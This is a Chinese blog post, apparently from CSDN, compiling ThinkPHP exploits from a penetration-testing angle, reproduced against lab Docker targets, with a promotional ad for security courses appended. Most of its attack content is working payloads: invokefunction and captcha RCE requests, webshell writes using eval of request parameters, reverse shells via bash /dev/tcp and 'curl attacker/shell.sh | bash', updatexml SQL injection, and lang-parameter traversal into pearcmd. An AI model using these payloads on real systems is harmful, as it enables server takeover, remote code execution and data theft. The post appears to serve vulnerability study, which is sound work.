ThinkPHP漏洞合集（专注渗透视角）_thinkphp v6，网络安全开发工程师面试题

xray✅

thinkphp_scan✅

项目地址：https://github.com/anx0ing/thinkphp_scan

ThinkphpRCE✅

项目地址：https://github.com/sukabuliet/ThinkphpRCE

蓝鲸✅

项目地址：https://github.com/bewhale/thinkphp_gui_tools

莲花✅

项目地址：https://github.com/Lotus6/ThinkphpGUI

尝试命令执行，未得到结果

Thinkphp全网GUI圈子社区专版✅

漏洞验证 & 利用

直接访问如下地址，即可执行phpinfo：
http://192.168.229.140:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

任意代码执行

http://192.168.229.140:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入webshell

http://192.168.229.140:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码

<?php phpinfo(); eval(@$_POST['cmd']); ?>

得到：
http://192.168.229.140:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20phpinfo()%3B%20eval(%40%24_POST%5B'cmd'%5D)%3B%20%3F%3E

访问一下后门地址，看起来写进去了

连接后门

反弹shell

方式1：通过webshell：bash -c 'bash -i >& /dev/tcp/192.168.229.1/9999 0>&1'

方式2：通过命令执行

http://192.168.229.140:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=bash+-c+'bash+-i+>%26+/dev/tcp/192.168.229.128/4444+0>%261'

ThinkPHP5 5.0.23 远程代码执行漏洞

漏洞介绍 & 环境准备

**漏洞原理：**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0（<5.0.24）中，框架在获取请求方法时会错误地对其进行处理，就是在获取method的方法中没有正确处理方法名，这使攻击者可以调用Request类的任何方法，攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。
影响版本：Thinkphp 5.0.0~ 5.0.23
环境搭建：

cd vulhub-master/thinkphp/5.0.23-rce
docker-compose up -d
docker ps

漏洞发现

TideFinger✅

项目介绍：https://mp.weixin.qq.com/s/ruZlZtEUC09xfy327kFG4g
下载地址：关注“Tide安全团队”公众号，回复指纹即可

TideFinger.exe -u http://192.168.229.140:8080/ -pd

afrog✅

项目地址：https://github.com/zan8in/afrog

nuclei✅

nuclei -tags thinkphp -u http://192.168.229.140:8080/

xray✅

thinkphp_scan✅

项目地址：https://github.com/anx0ing/thinkphp_scan

ThinkphpRCE✅

项目地址：https://github.com/sukabuliet/ThinkphpRCE

蓝鲸✅

项目地址：https://github.com/bewhale/thinkphp_gui_tools

莲花✅

项目地址：https://github.com/Lotus6/ThinkphpGUI

Thinkphp全网GUI圈子社区专版❌

漏洞验证 & 利用

发送如下数据包，尝试执行命令

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

传后门

方法1：

\_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php phpinfo(); eval(@$\_REQUEST['cmd']); ?>' > AAA.php

这里不能用 get 和 post  只能用 request
<?php @eval($\_GET["cmd"]);?>  失败
<?php @eval($\_POST["cmd"]);?> 失败

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.229.140:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 141
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=6d77e96725967c067fbaf184686b7473
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo+'<%3fphp+phpinfo()%3b+eval(%40$_REQUEST['cmd'])%3b+%3f>'+>+AAA.php

方式2：其实就是做了base64编码处理

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgcGhwaW5mbygpOyBldmFsKEAkX1JFUVVFU1RbJ2NtZCddKTsgPz4= | base64 -d > shell.php

反弹shell

这里的方法上文介绍过：https://www.yuque.com/u1881995/pborfs/vl6133h1trkn31vy#cnIjT
攻击者编写反弹shell的命令：bash -i >& /dev/tcp/192.168.229.128/4444 0>&1
然后开启一个web服务，让受害者下载并执行，获取shell

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.229.140:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=6d77e96725967c067fbaf184686b7473
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.229.128/shell.sh | bash

图省事也可以这样

ThinkPHP5 SQL注入漏洞 & 敏感信息泄露

**漏洞原理：**传入的某参数在绑定编译指令的时候又没有安全处理，预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式，在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码。
影响版本：ThinkPHP < 5.1.23
环境搭建：

cd vulhub-master/thinkphp/in-sqlinjection
docker-compose up -d
docker ps

启动后，访问http://your-ip/index.php?ids[]=1&ids[]=2，即可看到用户名被显示了出来，说明环境运行成功。

漏洞发现

TideFinger❌

项目介绍：https://mp.weixin.qq.com/s/ruZlZtEUC09xfy327kFG4g
下载地址：关注“Tide安全团队”公众号，回复指纹即可
发现了漏洞，但是没有发现目标漏洞，属于是发现了其他漏洞

./TideFinger_Linux -u http://192.168.229.140 -pd

afrog✅

项目地址：https://github.com/zan8in/afrog

nuclei✅

nuclei -tags thinkphp -u http://192.168.229.140

xray❌

发现了漏洞，但是没有发现目标漏洞，属于是发现了其他漏洞

thinkphp_scan✅

项目地址：https://github.com/anx0ing/thinkphp_scan

ThinkphpRCE✅

项目地址：https://github.com/sukabuliet/ThinkphpRCE

蓝鲸✅

项目地址：https://github.com/bewhale/thinkphp_gui_tools

莲花✅

项目地址：https://github.com/Lotus6/ThinkphpGUI

Thinkphp全网GUI圈子社区专版❌

漏洞验证 & 利用

访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1，信息成功被爆出：

QVD-2022-46174：ThinkPHP 代码执行漏洞

漏洞介绍

当ThinkPHP开启了多语言功能时，攻击者可以通过lang参数和目录穿越实现文件包含，当存在其他扩展模块如 pear 扩展时，攻击者可进一步利用文件包含实现远程代码执行。

| 影响版本 | 6.0.1 <= ThinkPHP <= 6.0.13
ThinkPHP 5.0.x
ThinkPHP 5.1.x | | |
| — | — | — | — |
| 不受影响版本 | ThinkPHP >= 6.0.14
ThinkPHP >= 5.1.42 | | |
| 修复方法 | 升级到安全版本：
ThinkPHP v6.0.14
ThinkPHP v5.1.42 | | |
| 缓解方案 | 关闭多语言功能 | | |

更多漏洞细节：
https://nox.qianxin.com/vulnerability/detail/QVD-2022-46174
https://mp.weixin.qq.com/s/9A6zmN4suEAeAKZoLmbMKQ

环境准备

参考复现文章：
对应“漏洞复现1”：https://mp.weixin.qq.com/s/zeyMQg-tbpQET6n07KjJeQ
对应“漏洞复现2”：https://blog.csdn.net/qq1140037586/article/details/128355617
使用CentOS虚拟机部署漏洞环境：

docker pull vulfocus/thinkphp:6.0.12
docker run -d -p 80:80 IMAGE ID 
docker ps

然后访问如下地址即可：http://192.168.229.140/public/index.php

通过漏洞通报可以知道，此次漏洞的前置条件是需要开启多语言功能

ThinkPHP 6
打开app/middleware.php
如果 \think\middleware\LoadLangPack::class 没有注释，代表着受此漏洞影响。

ThinkPHP 5
打开config/app.php，如果 'lang\_switch\_on' 为 true，代表着受此漏洞影响。

⚠️因此先进入容器进行查看是否满足前置条件

docker ps -a
docker exec -it CONTAINER ID  bash
find / -name middleware.php 2>/dev/null
cat /var/www/html/app/middleware.php

可以看到这里确实没有注释，也就是说是满足漏洞存在条件的

⚠️其次，因为这个漏洞的深入利用要借助到pearcmd的文件写入技巧，所以还需要查看pearcmd所在的路径

查看漏洞环境中pearcmd的路径是在：/usr/local/lib/php/pearcmd.php

漏洞复现1：写到tmp目录

到这里漏洞复现所需要的前置条件都已经满足了，那么测试下列poc，这里进行两种测试，一种是把文件写到网站同目录中，一种是写到tmp目录中。

这里先演示写到tmp目录，通过下面的利用代码可以看到，先是把文件写到tmp目录验证漏洞，之后把文件写到tmp目录下，利用漏洞。

# 写文件
http://xx.xx.xx.xx/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=phpinfo()?>+/tmp/hello.php

# 包含文件
http://xx.xx.xx.xx/public/index.php?lang=../../../../../../../../tmp/hello

# 直接写一句话木马
http://xx.xx.xx.xx/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($\_REQUEST['ant']);?>+/tmp/ant11.php

首先进行写入文件测试

得到响应之后查看tmp目录下是否成功写入

经过前后对比可以发现确实将<?=phpinfo()?>成功写入到了tmp目录下的hello.php文件中了。

测试文件包含的poc

注意，访问的是文件不带后缀，如果访问hello.php，反倒是看不到文件包含效果了

可以看到hello.php文件的代码确实被包含执行了。最后就是直接写入一句话木马进行getshell了。

写入一句话木马

看到后门已经写进去了

连接后门

访问一下后门地址：

连接后门

漏洞复现2：写到网站目录下

通过下面的利用代码可以看到，漏洞验证和漏洞利用的文件都写在了网站同级目录下
需要知道网站根目录才可以！

# 写文件
http://xx.xx.xx.xx/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+/var/www/html/test.php

# 包含文件
http://xx.xx.xx.xx/test.php

# 直接写一句话木马
http://xx.xx.xx.xx/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=eval(@$\_REQUEST['cmd']);?>+/var/www/html/shell.php

首先进行写入文件测试

包含文件

在上文“漏洞复现1”中，包含文件时发现不可以填写文件后缀才可以包含到，然而这里是需要填写文件后缀才可以包含到

写入一句话木马

连接后门

访问后门如下图所示，依然是看不见利用代码

连接后门

其他漏洞发现姿势

根据这个漏洞的通报可以知道，攻击者可以通过 get、header、cookie 等位置传入参数，实现目录穿越+文件包含，通过 pearcmd 文件包含的方法即可实现 RCE。那么接下来对几个位置传入参数进行测试

利用Header写入文件

上文写入的文件已经清理，保持靶场环境不受影响

GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/shell.php HTTP/1.1
Host: 192.168.229.140
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
think-lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think\_lang=zh-cn

这个时候，再访问写入的文件的时候，依然需要注意文件后缀。

http://192.168.229.140/public/index.php?lang=../../../../../../../../tmp/shell

除了通过uri访问，也可以通过如下方式：

GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/test.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


**自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。**

**深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/aa0b251599d5cd8fd5abc6a36e961d8f.png)
![img](https://img-blog.csdnimg.cn/img_convert/27c340451e6e538272c571a50bb9e303.png)
![img](https://img-blog.csdnimg.cn/img_convert/292016902a1d0b1c5183e562b891c420.png)
![img](https://img-blog.csdnimg.cn/img_convert/dbaf6ad4af2487e30cb64afd2708b0b4.png)
![img](https://img-blog.csdnimg.cn/img_convert/b745ea6f1e62a3456a9393f734233bb5.png)
![img](https://img-blog.csdnimg.cn/img_convert/bfdfc829e22e9b277961455c6a756bb3.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新**

**如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）**
![img](https://img-blog.csdnimg.cn/img_convert/69cc3cb9309d62c786cc596af1795a1a.png)



### 一、网安学习成长路线图


网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/aa7be04dc8684d7ea43acc0151aebbf1.png)


### 二、网安视频合集


观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f0aeee2eec7a48f4ad7d083932cb095d.png)


### 三、精品网安学习书籍


当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/078ea1d4cda342f496f9276a4cda5fcf.png)


### 四、网络安全源码合集+工具包


光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e54c0bac8f3049928b488dc1e5080fc5.png)


### 五、网络安全面试题


最后就是大家最关心的网络安全面试题板块  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/15c1192cad414044b4dd41f3df44433d.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/b07abbfab1fd4edc800d7db3eabb956e.png)  



**一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**
![img](https://img-blog.csdnimg.cn/img_convert/fb90931a7ad20669b82b834fc08cc62f.png)

### 三、精品网安学习书籍


当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/078ea1d4cda342f496f9276a4cda5fcf.png)


### 四、网络安全源码合集+工具包


光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e54c0bac8f3049928b488dc1e5080fc5.png)


### 五、网络安全面试题


最后就是大家最关心的网络安全面试题板块  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/15c1192cad414044b4dd41f3df44433d.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/b07abbfab1fd4edc800d7db3eabb956e.png)  



**一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**
[外链图片转存中...(img-FoDx6ZB9-1713024580785)]